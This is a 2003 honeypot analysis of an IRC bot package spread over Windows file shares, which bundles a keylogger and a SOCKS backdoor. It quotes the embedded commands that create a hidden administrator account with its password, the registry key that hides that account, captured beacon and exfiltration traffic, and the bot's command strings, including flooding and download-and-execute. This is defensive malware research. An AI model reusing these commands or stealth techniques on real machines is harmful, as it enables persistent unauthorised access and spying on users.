Revision History:
3 May 2003: Initial post.
21 June 2005: Updating.
This IRC bot package was received early on 13 April 2003 over simulated open file shares on TCP port 445 as would be seen on a Windows 2000 system; here's the log of that event (IP addresses removed):
04/13/03 07:03:20 GMT: connection 04/13/03 07:03:21 GMT: client disconnected 04/13/03 07:03:21 GMT: SMB session ended 04/13/03 07:03:21 GMT: connection SMB_COM_SESSION_SETUP_ANDX(1): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: '' SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: '' User: 'administrator', Domain: 'H-V70V19M36LBDK', WKS: 'H-V70V19M36LBDK' Wrote NTLMSSP_AUTH SMB to '.\NTL11D.tmp' SMB_COM_TREE_CONNECT_ANDX: '\\66.75.XXX.XXX\ADMIN$' SMB_COM_NT_CREATE_ANDX: '\system32\winhsvc32.exe' in TID = 0001 SMB_COM_CLOSE: FID = 0001 CLOSE: 'ADMIN$\system32\winhsvc32.exe' --> '.\SS211E.tmp', 279040 SMB_COM_TREE_CONNECT_ANDX: '\\66.75.XXX.XXX\IPC$' SMB_COM_NT_CREATE_ANDX: '\svcctl' in TID = 0002 SMB_COM_TRANSACTION: not implemented error SMB_COM_CLOSE: FID = 0002 SMB_COM_NT_CREATE_ANDX: '\svcctl' in TID = 0002 04/13/03 07:05:04 GMT: SMB session ended
As specified in the log, a port scan style connection was made and broken first. This is a full socket connection with three-way handshake and shutdown-style teardown.
It can also be seen that the file was intended to be copied to the ADMIN$ administrative share automatically set up on Windows NT/2000/XP Professional, etc. And the path would have put it in the Windows System directory (SYSTEM32 in NT/2000/XP, etc).
After the file is written to the target machine, the SMB/CIFS calls to the \svcctl named pipe (the Service Control Manager) are likely to install and/or start the copied file as a service. As seen below, the program also can install itself as a service locally; these calls are easy to make transparent using the Service Control Manager API.
As delivered, the file is packed with UPX and has embedded executables in it, including the Microsoft ntrights.exe tool, the "Blazing Tools Perfect Keylogger 1.2" program, and a SOCKS server backdoor. I ran the program on an isolated test system here. When run interactively, the program unpacks the embedded executables and installs itself as a local service. Here's a screenshot of the running processes on a Windows 2000 Professional system using SysInternals Process Explorer tool:
Most of the embedded files are unpacked to the Windows system directory, which on NT/2000/XP systems is named "SYSTEM32" by default and is a subdirectory of the Windows directory. On NT and 2000, the Windows directory defaults to "WINNT;" beginning with Windows XP, the default directory name shifts back to that used by Windows 9x, "WINDOWS." Here's part of the InCtrl5 report on the executable files created in that directory:
|
Different versions of a SOCKS server. When run, the wwm.exe program opens TCP port 21422 for incoming commands. |
|
|
|
The aforementioned Microsoft tool. |
|
These appear to be "Blazing Tools Perfect Keylogger" program files. |
|
|
|
|
|
|
|
The winhsvc32.exe program installs itself as a service after creating a user account with a name -- "SUPPORT_4829d82" -- that looks suspiciously like one XP installs by default as a part of its Remote Assistance feature. Click here for a screen grab of a similarly named account in an XP Home Edition installation. The account is created specifically for use by the service; the commands to do this are embedded in the unpacked executable; the order in the executable is different and it may be that the order of execution is also different:
"net.exe" users SUPPORT_4829d82 7r0j1nm0053 /add /fullname:"Microsoft Corporation" "net.exe" localgroup Administrators /add SUPPORT_4829d82 "ntrights.exe" -u SUPPORT_4829d82 +r SeServiceLogonRight
First, the account is created. The password is the parameter after the username. Then, the account is added to the Administrators group. Finally, the ntrights program is used to give the account the right to logon as a service. The service is embedded within the winhsvc32.exe program and it installs itself using that "special" account. As seen from a PEDUMP output of one of the DLLs imported, several Service Control Manager functions are imported (highlighted in bold below) and would accomplish these tasks.
ADVAPI32.dll Import Lookup Table RVA: 00000000 TimeDateStamp: 00000000 ForwarderChain: 00000000 DLL Name RVA: 000125B5 Import Address Table RVA: 00010000 Ordn Name 0 DeleteService 0 OpenServiceA 0 StartServiceA 0 CloseServiceHandle 0 CreateServiceA 0 OpenSCManagerA 0 SetServiceStatus 0 RegCloseKey 0 RegSetValueExA 0 RegCreateKeyExA 0 RegisterServiceCtrlHandlerA 0 StartServiceCtrlDispatcherA
The account created is configured similarly to the XP account -- it is also "hidden" from the XP welcome screen using the following Registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
(click
here for Google search on this key)
This is another measure to keep the software's activities stealthed from the owner/operator of the computer.
After the program first starts up, installs itself as a service, and unpacks it pieces, it launches all three applications. Here are some of the things these programs do.
An SMTP engine is used to e-mail a receipt that the keystroke logger is now installed on the victimized computer. Here's the message it sent from the honeypot system to an Dynamic DNS registered hostname that was hardcoded into one of the programs:
From: ***** To: ***** Subject: Perfect Keylogger was installed successfully: 4/13/2003, XX:XX XM (GOO2000\Administrator) Date: Sun, 13 Apr 2003 XX:XX:XX +0000 X-Mailer: CSMTPConnection v2.23 Content-Type: text/plain; charset=iso-8859-1 Perfect Keylogger was installed on the computer GOO2000, user Administrator at 4/13/2003, X:XX XM.
An HTTP request is sent to a second hostname; this one was a Dynamic DNS hostname that was hardcoded into one of the programs; the GET request excerpted below had some non-ASCII bytes embedded in it:
0x00000000: 47 45 54 20 2F 70 68 6F 72 6D 2E 70 68 70 3F 6E GET /pho rm.php?n 0x00000010: 69 63 6B 3D 73 20 48 54 54 50 2F 31 2E 31 0D 0A ick=s HT TP/1.1.. 0x00000020: 41 63 63 65 70 74 3A 20 2A 2F 2A 2C 20 2C 20 2C Accept: */*, , , 0x00000030: 20 2C 20 F0 FF 12 2C 20 8B F8 89 7D 94 39 75 E4 , ..., ...}.9u. 0x00000040: 75 06 57 E8 E0 0D 2C 20 4D 5A 90 0D 0A 55 73 65 u.W..., MZ...Use 0x00000050: 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 r-Agent: Mozilla 0x00000060: 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 /4.0 (co mpatible
Here's the reply from the server:
0x00000000: 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK. 0x00000010: 0A 44 61 74 65 3A 20 53 75 6E 2C 20 31 33 20 41 .Date: S un, 13 A 0x00000020: 70 72 20 32 30 30 33 20 58 58 3A 58 58 3A 58 58 pr 2003 XX:XX:XX 0x00000030: 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Se rver: Ap 0x00000040: 61 63 68 65 2F 31 2E 33 2E 32 37 20 28 55 6E 69 ache/1.3 .27 (Uni 0x00000050: 78 29 20 6D 6F 64 5F 6C 6F 67 5F 62 79 74 65 73 x) mod_l og_bytes 0x00000060: 2F 31 2E 32 20 6D 6F 64 5F 62 77 6C 69 6D 69 74 /1.2 mod _bwlimit 0x00000070: 65 64 2F 31 2E 30 20 50 48 50 2F 34 2E 33 2E 31 ed/1.0 P HP/4.3.1 0x00000080: 20 46 72 6F 6E 74 50 61 67 65 2F 35 2E 30 2E 32 FrontPa ge/5.0.2 0x00000090: 2E 32 35 31 30 20 6D 6F 64 5F 73 73 6C 2F 32 2E .2510 mo d_ssl/2. 0x000000A0: 38 2E 31 32 20 4F 70 65 6E 53 53 4C 2F 30 2E 39 8.12 Ope nSSL/0.9 0x000000B0: 2E 36 62 0D 0A 58 2D 50 6F 77 65 72 65 64 2D 42 .6b..X-P owered-B 0x000000C0: 79 3A 20 50 48 50 2F 34 2E 33 2E 31 0D 0A 54 72 y: PHP/4 .3.1..Tr 0x000000D0: 61 6E 73 66 65 72 2D 45 6E 63 6F 64 69 6E 67 3A ansfer-E ncoding: 0x000000E0: 20 63 68 75 6E 6B 65 64 0D 0A 43 6F 6E 74 65 6E chunked ..Conten 0x000000F0: 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 6D t-Type: text/htm 0x00000100: 6C 0D 0A 0D 0A 30 0D 0A 0D 0A l....0.. ..
No other HTTP data was seen and the connection is broken by the malware (TCP RST) after another five seconds.
As mentioned above, the SOCKS server is started listening for connections on TCP port 21422. This wasn't run for very long, but a port listener was established on that port and no incoming connections have been observed.
The IRC bot connects to a third IP address; this one is also a Dynamic DNS hostname hardcoded into one of the programs. Also hardcoded is the port number used; the bot connects to the server's TCP port 21424 and then begins an IRC session that remains active for as long as the service was allowed to run. During the time the bot was allowed to run, scores of computers joined and left the channel that the bot was logged into. It is assumed that the bot would respond to commands for it to do something, but aside from the typical pinging, no commands were observed while it was allowed to run.
It can be inferred from the route of infection and implicit function imports (WNetAddConnection2) that the bot program has a routine to scan IP addresses for open file shares and infect the IPs found.
The bot package wasn't run for very long, so there may have been other embedded functionality that wasn't observed due to the short time or overlooked in examining the executable internals. Obviously, disassembly would be the most thorough way to audit the full functionality of the malware.
There are a few different "classes" of IRC bots; two of the more popular classes are precompiled programs or "Mirc Script" based bots. The IRC bot in this particular "package" is the previously discussed service, winhsvc32.exe, which is a precompiled program, built with Microsoft Visual C++. The source code for many IRC bots is available -- such as sdbot -- and this program may turn out to be a variation on the sdbot code.
A quick way to peek into programs like this is to dump strings from the executable file; there are many implementations of programs that will "grep" through a sequnce of bytes and display embedded strings. After unpacking the program with UPX, we used a utility from SysInternals. Here is an excerpt of the strings, focused particularly on the IRC portions of the code:
PRIVMSG NOTICE %s%s %s%s%s PRIVMSG %s :finished sending packets to %s. PRIVMSG %s :error sending packets to %s. PRIVMSG %s :finished sending pings to %s. PRIVMSG %s :error sending pings to %s. connection type: %s (%s). local IP address: %d.%d.%d.%d. connected from: %s N/A LAN dial-up url visited. error visiting URL. invalid URL. WHOIS %s %d, %d : USERID : UNIX : %s bad url, or dns error. update failed: error executing file. downloaded %.1f kb to %s @ %.1f kb/sec. updating... PRIVMSG %s :opened %s. downloaded %.1f kb to %s @ %.1f kb/sec. Aupdate (%s - %dkb transferred) file download (%s - %dkb transferred) PRIVMSG %s :couldn't open %s. started scanning already scanning Inactive. %s infected. %s threads. Start=%s Current=%s. %s infected. not scanning stopped scanning cpu: %dMHz. ram: %dKB total, %dKB free. os: Windows %s (%d.%d, build %d). uptime: %dd %dh %dm %s [%s] ??? USERHOST %s user %s(%s) logged in. password accepted. user %s logged out. QUIT :reconnecting QUIT :%s QUIT :later %d. %s -[thread list]- %d. %s = %s -[alias list]- removing bot... NICK %s thread(s) killed. QUIT :later couldn't open file. file opened. couldn't resolve host %s -> %s PART %s MODE %s MODE %s NICK %s JOIN %s %s PART %s %s %s %s :%s downloading update from %s... update (%s) %s\%s.exe couldn't execute file. clone created on %s:%d, in channel %s. clone (%s) redirect created on port %d to %s:%d. redirect (%d->%s:%d) ACTION %s sending %d udp packets to: %s. packet size: %d, delay: %d[ms]. udp (%s) icmp.dll not available sending %d pings to %s. packet size: %d, timeout: %d[ms] ping (%s) ping udp c_a c_action c_pm c_privmsg redirect download clone downloading %s... download (%s) install execute update delay c_p c_part c_j c_join c_n c_nick c_m c_mode c_r c_raw repeat mode cycle action privmsg addalias visit dns server open prefix c_rn c_rndnick c_q c_quit killthread raw part join nick stop start sharescan remove sysinfo netinfo log aliases threads about status quit disconnect reconnect logout die rndnick $chr( $server $rndnick $chan $user $me $%d $%d- NOTICE %s : VERSION %s VERSION login 332 joined channel %s. 353 QUIT PART NICK screw you %s! NOTICE %s :%s user %s logged out. KICK 302 005 001 JOIN %s %s PONG %s PING WHOIS list NICK %s USER %s 0 0 :%s connected to %s. bot started. ctcp raw PRIVMSG $1 :$chr(1)$2-$chr(1) ping $1 10000 $2 50 udp $1 10000 2048 50 smack action $chan smacks $1 opme mode $chan +o $user
